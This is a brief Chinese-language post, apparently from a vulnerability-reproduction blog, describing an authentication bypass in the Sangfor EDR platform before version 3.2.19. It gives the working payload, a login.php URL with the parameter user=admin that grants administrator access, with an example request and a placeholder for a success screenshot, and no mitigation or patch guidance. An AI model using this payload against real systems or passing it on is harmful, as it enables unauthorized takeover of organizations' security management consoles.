某信服-SANGFOR终端检测响应平台 - 任意用户登录 0day

影响范围

平台版本号:< 3.2.19

0x02 漏洞利用

payload: https://ip/ui/login.php?user=admin

例如: https://127.0.0.1:5000/ui/login.php?user=admin

成功利用

某信服-SANGFOR终端检测响应平台 - 任意用户登录 0day_第1张图片

参考文章:

https://www.yuque.com/pmiaowu/hcy2bz/fp4icw?from=groupmessage

你可能感兴趣的:(WEB,漏洞复现和分析)